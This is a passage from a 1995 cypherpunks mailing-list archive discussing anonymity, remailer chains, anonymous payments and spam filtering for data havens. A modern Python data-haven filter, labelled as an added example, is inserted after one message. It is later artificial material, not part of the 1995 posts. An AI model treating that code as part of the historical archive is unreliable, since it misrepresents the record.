Barlow once putting it, "... getting a peeping tom to install your
window blinds," or something like that).  In addition to the
government's own motivations for eroding privacy, all the above
economic considerations enter into government through lobbying,
desires to maximize tax revenues, fund-raising considerations, and a
whole raft of other avenues.

Furthermore, the only tools which government could bring to bear would
be a complex web of laws and regulations governing the circulation of
personal data.  Such laws and regulations would have to constantly
shift in a never ending cat-and-mouse game with business; and what's
more, many of these laws and regulations would necessarily conflict
with the free speech rights of private organizations.

Bottom line: Anonymity is the only available tool which puts control
over my own privacy firmly into my own hands, where it belongs, and
does so without infringing on anyone's freedom of speech.  Certainly
there are drawbacks, and anonymity may invite some abuses; but we have
survived anonymity's problems in the past, and 'tis better to suffer
in the hell we know than to be dragged into a new and hotter one.  The
only society without any crime is a society without any freedom.

My ($.02) conclusion: For preserving meaningful privacy, and for
preventing an ugly and probably irreversible transformation of our
world, anonymity is the best, perhaps the only viable tool we have.

					---  mkj

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolb <carolb@barton.spring.com>
Date: Sun, 8 Jan 95 03:15:57 PST
To: mkj@october.ducktown.org
Subject: Re: The Value of Anonymity
In-Reply-To: <199501080700.CAA00298@october.ducktown.org>
Message-ID: <Pine.3.89.9501080401.A7875-0100000@barton.spring.com>
MIME-Version: 1.0
Content-Type: text/plain



No, sometimes you don't learn till you've made a mistake.
As you could see I hurt really badly yesterday.

And now, so I can occupy myself quietly for a few days, are there
some good files to read so I can understand, and become a good remailer?


Registered<BETSI>BEllcore Trusted Software Integrity system programmer
***********************************************************************
Carol Anne Braddock   "Give me your Tired, your Poor, your old PC's..."
The TS NET                                  REVOKED PGP KEY NO.0C91594D     
carolb@spring.com                                       carolann@mm.com
************************************************************************
COMING SOON TO AN INTERNET NEWSGROUP NEAR YOU...............CENSORED.COM

On Sun, 8 Jan 1995 mkj@october.ducktown.org wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> The value of anonymity, both on the nets and off, seems to be poorly
> understood, even among its strongest defenders.  The positive value of
> anonymity is not merely about protecting a few special groups such as
> sexual-abuse victims and whistleblowers.  While these are certainly
> valuable uses, if I believed that anonymity's positive impact were
> limited to these outside-the-mainstream groups, then I probably
> wouldn't accept the benefits of anonymity as outweighing its costs.
> 
> But in fact, I believe that anonymity has crucially important benefits
> for nearly everyone.  There are several good arguments to be made, but
> in the interest of brevity I'll focus on only one:
> 
> The explosive development of such personal data industries as targeted
> marketing and consumer and demographic profiling, have demonstrated
> that the business community considers personal data to be of great
> economic value.  (There's a parallel observation to be made here about
> governments, but I won't go into that now.)  There are also myriad
> uses being made of personal data throughout the professions, from
> labor negotiators to house burglars.  It is something of a truism that
> anyone who knows enough about you can probably find a way to beat you,
> either legally or illegally, often at great profit to themselves.
> 
> In an information-age society without extremely strong privacy
> protections, the chief factor which makes the difference between
> winners and losers may be how much information each of us has on
> others, and how much they have on us.  Given this degree of economic
> and social motivation, it is easy to imagine the sort of panopticon
> which will soon arise on the Internet (and its descendants), unless
> the strongest possible protections are adopted.  (And it is equally
> easy to imagine who the biggest winners and losers will be.)
> 
> Relying on government to protect personal privacy is like appointing
> the fox to guard the henhouse (or, as I seem to recall John Perry
> Barlow once putting it, "... getting a peeping tom to install your
> window blinds," or something like that).  In addition to the
> government's own motivations for eroding privacy, all the above
> economic considerations enter into government through lobbying,
> desires to maximize tax revenues, fund-raising considerations, and a
> whole raft of other avenues.
> 
> Furthermore, the only tools which government could bring to bear would
> be a complex web of laws and regulations governing the circulation of
> personal data.  Such laws and regulations would have to constantly
> shift in a never ending cat-and-mouse game with business; and what's
> more, many of these laws and regulations would necessarily conflict
> with the free speech rights of private organizations.
> 
> Bottom line: Anonymity is the only available tool which puts control
> over my own privacy firmly into my own hands, where it belongs, and
> does so without infringing on anyone's freedom of speech.  Certainly
> there are drawbacks, and anonymity may invite some abuses; but we have
> survived anonymity's problems in the past, and 'tis better to suffer
> in the hell we know than to be dragged into a new and hotter one.  The
> only society without any crime is a society without any freedom.
> 
> My ($.02) conclusion: For preserving meaningful privacy, and for
> preventing an ugly and probably irreversible transformation of our
> world, anonymity is the best, perhaps the only viable tool we have.
> 
> 					---  mkj
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> -----END PGP SIGNATURE-----
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 8 Jan 95 09:41:01 PST
To: cypherpunks@toad.com
Subject: Re:  The Value of Anonymity
Message-ID: <199501081741.JAA05815@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: mkj@october.ducktown.org
> The value of anonymity, both on the nets and off, seems to be poorly
> understood, even among its strongest defenders.  The positive value of
> anonymity is not merely about protecting a few special groups such as
> sexual-abuse victims and whistleblowers.  While these are certainly
> valuable uses, if I believed that anonymity's positive impact were
> limited to these outside-the-mainstream groups, then I probably
> wouldn't accept the benefits of anonymity as outweighing its costs.

These are good points.  However I think your presentation is a little too
oriented towards the libertarian perspective of distrusting government,
and also comes off sounding harshly competitive:

> It is something of a truism that
> anyone who knows enough about you can probably find a way to beat you,
> either legally or illegally, often at great profit to themselves.
> 
> In an information-age society without extremely strong privacy
> protections, the chief factor which makes the difference between
> winners and losers may be how much information each of us has on
> others, and how much they have on us.

I think most people don't think so much in terms of winners and losers,
of beating and being beaten.  Rather, I think it will be more acceptable
to couch the issue in simple privacy terms.  People do value their
privacy.  I don't think you have to overly justify the value of privacy.
A few examples of how little privacy people could actually have in a
non-anonymous network of the future should suffice to establish
motivation IMO.

> Given this degree of economic
> and social motivation, it is easy to imagine the sort of panopticon
> which will soon arise on the Internet (and its descendants), unless
> the strongest possible protections are adopted.

I like this phrase!  It nicely connotes the transparency of the nets.

> Relying on government to protect personal privacy is like appointing
> the fox to guard the henhouse (or, as I seem to recall John Perry
> Barlow once putting it, "... getting a peeping tom to install your
> window blinds," or something like that).  In addition to the
> government's own motivations for eroding privacy, all the above
> economic considerations enter into government through lobbying,
> desires to maximize tax revenues, fund-raising considerations, and a
> whole raft of other avenues.

This is where I think you are getting too libertarian for a broad
audience.  Also, this wording invites the reader to assume that anonymity
will lead to tax avoidance and evading laws.  Most people feel that they
are paying their own taxes, and if others avoid them then it just
increases the burden on themselves.  So except to certain selected groups
I would avoid playing this angle up.  I think your next argument
will have wider appeal:

> Furthermore, the only tools which government could bring to bear would
> be a complex web of laws and regulations governing the circulation of
> personal data.  Such laws and regulations would have to constantly
> shift in a never ending cat-and-mouse game with business; and what's
> more, many of these laws and regulations would necessarily conflict
> with the free speech rights of private organizations.

Be aware that this is in fact the "mainstream" solution to the problem.
There was some discussion on comp.org.eff.talk of some kind of committee
headed by EFF board member Esther Dyson which issued a statement on
privacy protection in the nets.  They issued the by-now traditional call
for laws along the lines of "information collected for one purpose cannot
be used for another purpose".  Like, VISA can't sell data on your
spending patterns, at least not without telling you.  Nobody criticized
this point; even the relatively net-aware civil liberties types mostly
explicitly endorsed this provision.  Laws like this are apparently
already in place in Europe.  So the momentum is in exactly this
direction.

I think your arguments are good ones; the government would undoubtedly
exempt itself from such rules (the IRS is already starting to use
dataveillance and matching to look for discrepancies between tax returns
and spending patterns), plus such provisions would seem to require a
labyrinth of exceptions, special cases, etc.  Eventually I could see laws
telling exactly what a business can and cannot do with the names of
people who phone or net in for information; yes, they can be kept on a
list for up to 6 months and sent additional promotional literature,
except that the business must require standard form 11832 to allow the
customer to get his name off the list, which must be handled within 5
working days for businesses with more than 100 employees, etc., etc.  You
could have volumes of this kind of stuff.  I think Tim wrote some essays
a long time back pointing out the absurdity of this approach, especially
if you tried to apply it to private individuals.

> Bottom line: Anonymity is the only available tool which puts control
> over my own privacy firmly into my own hands, where it belongs, and
> does so without infringing on anyone's freedom of speech.  Certainly
> there are drawbacks, and anonymity may invite some abuses; but we have
> survived anonymity's problems in the past, and 'tis better to suffer
> in the hell we know than to be dragged into a new and hotter one.  The
> only society without any crime is a society without any freedom.
> 
> My ($.02) conclusion: For preserving meaningful privacy, and for
> preventing an ugly and probably irreversible transformation of our
> world, anonymity is the best, perhaps the only viable tool we have.

That's a good summary.  This is definitely an uphill battle, though.  I
see no significant standards body or organization of influence (except
for CPs, to the extent that we have any influence) which is moving in
this direction.  Add to this the costs of anonymity as Wei has been
discussing and it really isn't clear how to proceed.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLxAj1xnMLJtOy9MBAQGujQIAqooWk8OsbJzbAGpxIP+EYnPJM0kA7Ojm
/3i04Odoq/YZEH1Fv81/RbwsDahe+AGtmqU+VQ1KpjUTJuPfNKJ4dQ==
=w/FH
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Sun, 8 Jan 95 11:29:40 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Anonymity and cost
In-Reply-To: <199501080018.QAA11241@netcom4.netcom.com>
Message-ID: <199501081921.AA00714@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Tim May wrote:

> > At a very basic level, anonymous (not pseudonymous, like the remailers
> > are) messages are *cheaper*, because they carry less information; they
> > do not need to send the bits which identify the sender. 

> I think the meaning of "anonymous" here is clearly with respect to
> _traffic analysis_. The "cost of anonymity" is with respect to the
> costs and delays of using digital mixes (remailers).

I don't think it's useful to redefine "anonymous" to include some 
messages which identify the author, and to exclude some messages which
do not identify the author. Then again, I'm not sure it's useful to
play Language Cop, either. But count mine as a voice in favor of
describing accurately what's being discussed. (Perhaps messages which
defy traffic analysis might be called "untraceable" but not 
"anonymous", unless they also do not identify an author.)

> > Anonymous video conferencing is available now; go to Kinko's, pay
> > cash for the use of their video conference room. Or, ask/convince
> > the recipient to consider the conversation "off the record". 

> Neither of these kinds of "anonymity" are cryptographically
> interesting, or strong.

I agree. I fear I've been influenced by some of the authors on that
Cypher[something] list who've recently argued persuasively in favor
of applying technology appropriate to local conditions; e.g., not
wasting time on the techno-gadget-of-the-month when more pedestrian
but functional means are available.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. Todd Masco" <cactus@hks.net>
Date: Sun, 8 Jan 95 11:54:15 PST
To: cypherpunks@toad.com
Subject: Re: Too Much!
Message-ID: <199501081959.OAA21945@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Paul J. Ste. Marie writes:
> At 01:16 AM 1/7/95 -0500, L. Todd Masco wrote:
> >You might want to try reading it from NNTP, via c2.org or hks.net.  You
> >can then use Kill files.
> 
> At that point, isn't the mailing list simply becoming a newsgroup?  For that 
> matter, is there some reason that escapes me why it ISN'T a newsgroup?  I 
> suppose the proportion of net.kooks is higher in a newsgroup than a mailing 
> list, but arguably we're ALL net.kooks here.


Not really, not until a huge number of hosts carry it as a newsgroup.
As for why cypherpunks isn't a newsgroup... IMO, it would end up carrying
too much traffic and be way too high profile.

As is, the people who really want to find it will and hordes of riff-raff
(not all, mind you) are less likely to bother with it.

	-- Todd
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLxBD/yoZzwIn1bdtAQHMrAF8ChmS332TabEbGslXsxzOLqIHEBOnJBYs
KIdzflR9PJWsYuNJBH6LrHtBWK/q7ejP
=T4k6
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erik Selberg <speed@cs.washington.edu>
Date: Sun, 8 Jan 95 19:17:30 PST
To: Cypherpunks@toad.com
Subject: Re: From me to me to you...The Actual Article
Message-ID: <199501090318.TAA14113@meitner.cs.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


Carol Anne Braddock writes:

> This is the article, and what I did with it. It is complete in its
> entirety, from the bang paths, to the crosspostings. Please study them

> Now, the article,

> Date: Sat, 7 Jan 1995 01:26:26 -0600
> From: Carol Anne Braddock <carolann@vortex.mm.com>
> To: carolann@vortex.mm.com
> Newsgroups: soc.support.transgendered, alt.transgendered,
>   mn.general, alt.sex.femdom, alt.artcom, alt.sex.bondage, alt.sex,
>   comp.infosystems.www.users, alt.dreams.lucid, alt.dreams 
> Subject: (fwd) Re: Phil Zimmermann

So, I don't read any of those groups, and I could be dead wrong on all
of this. But I'll yap away anyway.

Off the cuff, I'd say your article could be inappropriate. Granted
it's a good cause, and you're not advertising for yourself but for a
charity. However, charitable spam is still spam (and I'm not calling
your article spam... spam lite, maybe). I understand your point about
feeling a sense of community with the above groups; however, I think
that massive "Please help..." postings can be just as annoying as the
MAKE.MONEY.FAST postings.

					Erik Selberg
"I get by with a little help		selberg@cs.washington.edu
 from my friends."			http://www.cs.washington.edu/homes/selberg




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sun, 8 Jan 95 19:27:03 PST
To: jRT <jrt@asiaonline.net>
Subject: Remailer security
In-Reply-To: <Pine.SUN.3.91.950109054255.21650A-100000@asiaonline.net>
Message-ID: <Pine.SUN.3.91.950108182612.5411B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Jan 1995, jRT wrote:
> 
> The thing being, say you set up an anonymous-video-or-otherwise-remailer, 
> you have to ensure that people don't manage to get into that as such 
> would obviously give away the identities of all parties.  Given that 
> people can supposedly hack the DOD computer system, that doesn't seem so 
> unlikely, so are anonymous-remailers really all that safe?

This is why you want to use a remailer chain instead of just one remailer.
Hopefully, not all of the remailers in your chain are subverted by your 
enemy.  (They may all be subverted, but as long as not by people who 
cooperate with your enemy you're still ok :-)  Also, make your chains as 
heterogeneous as possible.  That is, include remailers that use different 
hardware, operating systems, remailer softwares, are in different 
countries, are controlled by different organizations, etc., so that one 
security hole will not compromise your entire chain.

I've kinda evaded the original question, which is about the (average?) 
security of the individual remailers.  Does anyone have a real answer?

Wei Dai
PGP encrypted mail welcome.  (I realize a PGP signature says this 
implicitly, but I left my key in another computer.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Sun, 8 Jan 95 18:41:03 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
In-Reply-To: <199501021344.FAA11566@largo.remailer.net>
Message-ID: <Yr94lKjqRqWD075yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199501021344.FAA11566@largo.remailer.net>, you wrote:
>    From: skaplin@skypoint.com (Samuel Kaplin)
>
>    I was looking at the bigger picture. Any merchant who accepts Visa or MC
>    could now accept anonymous payments. No hassle at all on their part.
>    [...]
>    The key
>    would be not to have the card attached to the account. If the card is
>    attached to any type of account, then there are reporting requirements.
>
> Visa was talking about an electronic traveller's check, which, from
> what I could tell, instantiated an account in the sum of the value of
> the card purchased, which was then drawn down by purchase.  The card,
> evidently, had no embossing on it.  Personalization was limited to
> some account id which would last the lifetime of the balance and then
> disappear.

This is EXACTLY what I was contemplating. I really wish they would
implement it. Then I can get the traveler's cheques out of my wallet.
(unsigned in both spots, of course.)

- --
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
E-mail key@four11.com for PGP Key or   | "...vidi vici veni" - Overheard
Finger skaplin@mirage.skypoint.com     | outside a Roman brothel.
==============================================================================
                 Be careful when playing under the anvil tree.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Sun, 8 Jan 95 18:18:53 PST
To: mkj@october.ducktown.org
Subject: Re:  The Value of Anonymity
Message-ID: <9501090217.AA13075@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Hear, hear!  mkj's article on anonymity is worth reading.

From my perspective, the most important thing cryptography offers us
is not just the ability to have private conversations without eavesdroppers;
it's the ability to change the balance of power from the centralized
control and accumulation of information that computers bring back
to a level where _you_ can control what happens to your personal data.

Do you _like_ starting transactions by giving some big company your
Social Security Number which lets them, and everyone else, know
everything you've ever done, where you live, how you vote, what you buy?
We can move to a society where you can give the other party as much
information as they need to do business with you, without having to 
give them everything else, or connect this transaction to all your others.
Sometimes that means giving people more detail than you give them now, 
usually less.  Cryptography becomes the technical glue to control 
how much you tell somebody on each transaction, anywhere from total
anonymity to deep personal information, to let you have a driver's license
that says "yes this person is a safe driver" without it becoming
the key to your bank account if you lose your wallet, to have voter's
registration that doesn't permit fraud but doesn't require universal
identification.

Some good technical references are the set of papers that David Chaum
published about blind signatures and anonymous credentials.

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Sun, 8 Jan 95 19:53:13 PST
To: Dave Del Torto <ddt@lsd.com>
Subject: Vinge's _A Fire Upon the Deep_
In-Reply-To: <ab32340f410210037a5d@[192.187.167.52]>
Message-ID: <Pine.SV4.3.91.950108224048.17345C-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> I _WISH_ I had VV's email address! I'd like to send the guy a big thank-you
> and ask if he's writing a sequel (yet). If anyone does know it, puh-LEEze
> mail me. First book of his I've read, first of its kind I've enjoyed in a
> very long time. I'll scan my favorite crypto-related (legal-length) excerpt
> and post it next week, howzat?

   Ditto that.  I've enjoyed all of his works.  He's one of my top three 
favourite SF writers of all time.

   Any of you who are in contact with VV have an e-mail address for him?  
He deserves accolades, but snailmail is too slow for my liking.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Sun, 8 Jan 95 19:54:12 PST
To: weidai@eskimo.com
Subject: Re: Latency, bandwidth, and anonymity
Message-ID: <9501090353.AA13655@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


My initial reaction to "Anonymous video conferencing" was
"That's when you wear black ski masks and use voice scramblers
and call from video payphones", i.e. not very useful.
("Subcomandata Marcos here...")

On the other hand, Wei Dai's followup message about
> In the longer term, anonymous communication is in danger of being used
> only by fringe groups if it falls too much behind the non-anonymous kind
> in terms of latency and bandwidth (and cost, I guess).  Maybe ONLY drug
> dealers, nuclear terrorists, etc., will use anonymous remailers when full
> sensory virtual interaction is the most popular way for most people to
> communicate and remailers are still the only choice for the
> anonymity-conscious.
puts a different spin on it.  It's a real problem, if not now, then
maybe in 5-10 years.  I realize that those of us in the Phone Company
who have predicted universal Picturephone in the past have been 
over-optimistic :-), but the video compression people and the faster-chip
people keep bringing us closer to having good-quality low-bandwidth video,
and ISDN and fast modems are bringing available loop-end bandwidth up
to the point that reasonably-priced circuits can carry it.  (Long-haul
raw bits have been cheap enough for a while; it's the distribution
and switching technology that have a lot of the cost, and providing
cheap high-bandwidth circuits makes it hard to make money on voice calls.)

The approaches to anonymous video conferencing will depend a bit
on whether the technology takes off on the nets or the phone system,
if those two are still different by then.  It's easier to obscure
the origins of a call on the nets, where users own large parts,
than it is on the phone system, where the Phone Companies own
and operate most of it; the latter environment would require
Phone Remailers, such as PBXs you call into on T1 lines and get
shuffled out on other circuits - it's hard to get adequate mixing
except in rather large environments....  Recircuiting on the nets
will be left as an exercise to the reader.

I suspect the harder parts of the job may be doing the faces and 
voices right - anonymous voice conference bridges are ok if the
participants mostly don't know each other, but they're less useful
if people know each other and cops with computerized voiceprint equipment
may be eavesdropping (not common now, though computers and models of
the human voice are improving; I suppose voice disguisers may improve
from the kid's-toy quality to something better if there's a market,
or if computers with full-duplex soundcards become more common.)

Faces are harder, and they're not really a crypto problem -
how do you fake them well?  It's not too hard to do a "quayletool"
quality solution that generates moving lips in front of a static
picture, even timed with an audio feed, but that won't play too well
in the business world, and having the camera pointing at your calendar
or home page is only semi-useful.  If video-calling evolves on the nets,
there'll be a lot more need for speed-matching services, and it may
be that computer-enhanced video receiving for high-bandwidth users
will fund the technology development for face-simulation?
If so, maybe you can use it to start with fake stills instead of 
real ones?

				Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Sun, 8 Jan 95 20:49:40 PST
To: dfloyd@io.com
Subject: Re:  Data Haven problems
Message-ID: <9501090448.AA14477@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


dfloyd asks for ideas about preventing spamming in data havens,
for the code that he's working on.  It's a hard job.
A related problem is how to prevent your data haven from becoming
the porno-ftp site of the week, and either being swamped with
traffic or raided by the Post Office Reactionary Neighborhood Police.

One way to stop spamming is to charge sufficient money for the service
that using it always pays for itself - spamming is then reduced
to a source of profit, e.g. no problem.  If people want to hire
you to store spam, it's their money they're wasting.  But that
requires an anonymous digital cash infrastructure, which we don't
really have yet.  And it's a lot less interesting academically (:-)
than finding solutions which can also work in a cooperative system,
or at least a system that doesn't charge per transaction.

Probably the most important step you can take is to build in
operator-selectable filtering, because the problems keep changing.
Operators probably need to be able to block storage and retrieval
by specific users and sites (It's easier to prevent access by 
president@whitehouse.gov than it is to detect forged requests, 
and you probably want to keep both real and fake Canter&Siegel users off,
plus the bozo of the month and the broken-remailer of the day.)
Some operators may find it useful to limit the amount of data
that can be stored or retrieved by a specific user or site, 
though this is less useful with anonymous and pseudonymous remailers
around, since "a specific user" becomes vaguer.

Filtering by filename and type can also be useful - if you don't allow
files named *.gif and *.jpg, users may be less likely to
spam you with pornography.  Namespace control in general is an issue -
do users get to choose filenames, or list directories, or do they
have to know the names of files to retrieve?
Another issue is whether files can only be retrieved by the sender -
probably a local policy issue.  

Some sites may only accept encrypted files, which reduces the spam 
potential considerably, as well as reducing your exposure to the
porn police, though it's difficult to do anything about files that are
encrypted with a public key whose private key has been posted to the net,
or fake crypto headers in an otherwise unencrypted file,
unless you put in lots more code to check the insides of files and
watch the net for such postings, which is unrealistic.  There's also
the problem that PGP and especially RIPEM files are non-stealthy,
and users may not want to leave even keyids in their files.

		Bill
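
The filtering ideas in the message above, as an added example in Python (not part of the original post and not dfloyd's code): an operator-configurable admission check with sender and site blocks, filename patterns, a per-sender quota, and an encrypted-only rule that looks inside the armor to catch a fake crypto header around plaintext. The policy fields, function names and sample files are assumptions constructed for illustration.

```python
import base64
import binascii
import fnmatch
from dataclasses import dataclass, field

ARMOR_BEGIN = "-----BEGIN PGP MESSAGE-----"
ARMOR_END = "-----END PGP MESSAGE-----"
# OpenPGP packet tags that start an encrypted message: 1 = public-key
# encrypted session key, 3 = symmetric-key encrypted session key,
# 9 and 18 = symmetrically encrypted data.
ENCRYPTED_TAGS = {1, 3, 9, 18}


@dataclass
class HavenPolicy:
    """Operator-selectable filters (hypothetical field names)."""
    blocked_senders: set = field(default_factory=set)
    blocked_sites: set = field(default_factory=set)
    denied_names: tuple = ("*.gif", "*.jpg")
    quota_bytes: int = 64 * 1024
    encrypted_only: bool = True


def armor_payload(text):
    """Return the decoded bytes inside PGP armor, or None if malformed."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if len(lines) < 3 or lines[0] != ARMOR_BEGIN or lines[-1] != ARMOR_END:
        return None
    body = lines[1:-1]
    if "" in body:                      # armor headers end at the blank line
        body = body[body.index("") + 1:]
    # Drop the "=XXXX" checksum line; this sketch does not verify it.
    body = [ln for ln in body if ln and not ln.startswith("=")]
    try:
        return base64.b64decode("".join(body), validate=True)
    except (binascii.Error, ValueError):
        return None


def first_packet_tag(data):
    """Return the tag of the first OpenPGP packet, or None if not a packet."""
    if not data or not data[0] & 0x80:  # bit 7 is set on every packet header
        return None
    if data[0] & 0x40:                  # new-format header: tag in bits 5-0
        return data[0] & 0x3F
    return (data[0] >> 2) & 0x0F        # old-format header: tag in bits 5-2


def admit(policy, used, sender, filename, content):
    """Return (accepted, reason); `used` maps sender -> bytes stored so far."""
    sender = sender.lower()
    site = sender.rpartition("@")[2]
    if sender in policy.blocked_senders:
        return False, "blocked sender"
    if site in policy.blocked_sites:
        return False, "blocked site"
    name = filename.lower()
    if any(fnmatch.fnmatchcase(name, pat) for pat in policy.denied_names):
        return False, "denied filename"
    size = len(content.encode("utf-8"))
    if used.get(sender, 0) + size > policy.quota_bytes:
        return False, "quota exceeded"
    if policy.encrypted_only:
        payload = armor_payload(content)
        if payload is None:
            return False, "not PGP armor"
        # A structural check only: it cannot tell whether the private key
        # for the recipient has been posted to the net.
        if first_packet_tag(payload) not in ENCRYPTED_TAGS:
            return False, "armor does not hold an encrypted packet"
    used[sender] = used.get(sender, 0) + size
    return True, "stored"


def make_armor(raw):
    """Wrap bytes in armor for the constructed samples (dummy checksum)."""
    b64 = base64.b64encode(raw).decode()
    return "\n".join([ARMOR_BEGIN, "Version: 2.6.2", "", b64, "=AAAA", ARMOR_END])


# Constructed samples, not real ciphertext.
GENUINE = make_armor(bytes([0x85, 0x00, 0x8C]) + bytes(140))        # tag 1
FAKE_TEXT = ARMOR_BEGIN + "\n\nthis is plain text, not base64\n" + ARMOR_END
FAKE_LITERAL = make_armor(bytes([0xAC, 0x0D]) + b"b\x00\x00\x00\x00\x00plain")

if __name__ == "__main__":
    policy = HavenPolicy(blocked_senders={"president@whitehouse.gov"})
    used = {}
    for who, name, body in [
        ("alice@example.org", "notes.pgp", GENUINE),
        ("alice@example.org", "pic.gif", GENUINE),
        ("alice@example.org", "x.pgp", FAKE_TEXT),
        ("alice@example.org", "y.pgp", FAKE_LITERAL),
        ("president@whitehouse.gov", "z.pgp", GENUINE),
    ]:
        print(who, name, admit(policy, used, who, name, body))
```
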




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Mon, 9 Jan 95 00:04:06 PST
To: "L. Todd Masco" <cactus@seabsd.hks.net>
Subject: Re: Vinge's True Email name ?
In-Reply-To: <199501090729.CAA28854@bb.hks.net>
Message-ID: <Pine.SUN.3.91.950108234702.25620E-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Jan 1995, L. Todd Masco wrote:

> Sigh.  Please don't use this, people.  I'm sure VV has no desire to 
> pay for oodles of mail telling him just how much people like him.  Treat
> it like a home phone number (of course, some people abuse home phone
> numbers of famous folks...).

A general hint for finding authors' e-mail addresses: figure out where 
he/she works from the book jacket, use WHOIS to find their domain name, and 
then finger them or look at their web page to see if they have an e-mail 
directory.  (Now keep this a secret!  I don't want the internet.masses to 
find out my e-mail address when I become rich and famous! :-)

I bet Vinge has written for himself a really intelligent filter like the 
kind he describes in AFUtD.  Of course I wouldn't want to test this.

I guess this is not really related to cypherpunks, except to the general 
philosophy of making tools to protect oneself, instead of relying on the 
good will (and intelligence) of others.

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Sun, 8 Jan 95 21:09:23 PST
To: cypherpunks@toad.com
Subject: Re:  Can someone verify this conjecture for me?
Message-ID: <9501090508.AA14605@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: nelson@crynwr.com (Russell Nelson)
> > It seems like it solves two separate problems: 1) foiling traffic
> > analysis, and 2) foiling a cheater remailer.  The problems are
> > separate, really, because if you really, really trust the remailer (as
> > many people do Julf), then 2) isn't a problem.  All you need to do is
> > solve 1.  Or, you can solve 1) by using a single remailer.  A
> > necessary but not sufficient step to foil traffic analysis is to strip
> > headers.

There are a couple of advantages of chaining multiple remailers.
One is that traffic analysis is an art, rather than a science,
and to really foil it, you've got to know how good it is, which is hard.
Long-term patterns may show up even though the traffic mixes
are pretty good in the short run, and if you can spread out the remailer
use and increase the traffic load, plus constantly sending encrypted
traffic between remailers, it does make the job harder.
If the Bad Guys can isolate their target to a few remailer users,
they can often find the real one by rubber-hose or a small number
of wiretaps at the user locations instead of the remailers;
that's impractical if there are thousands of potential users in
multiple countries across the remailer-chain.

Another is that if one good trustable remailer can foil traffic
analysis, then multiple remailers increases the chance that
at least one of them is good.  Sure, Julf's a good guy, but what
if the KGB has kidnapped his grandmother, or the CIA has planted
wiretaps inside his computer - will you know if it's compromised?

There's also the reliability issue - what if the Finnish Phone Company
decides Julf is using too much of their resources and cuts him off,
or the Mafia steals one of your police-informants' remailers,
or the California Public Utilities Commission declares email to be
a common carrier and insists on auditing all transactions?
Multiple remailers in a strongest-link chain reduce the risks.

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Poppler <lwp@garnet.msen.com>
Date: Sun, 8 Jan 95 21:16:53 PST
To: Jonathan Cooper <entropy@IntNet.net>
Subject: Re: Vinge's True Email name ?
In-Reply-To: <Pine.SV4.3.91.950108224048.17345C-100000@xcalibur>
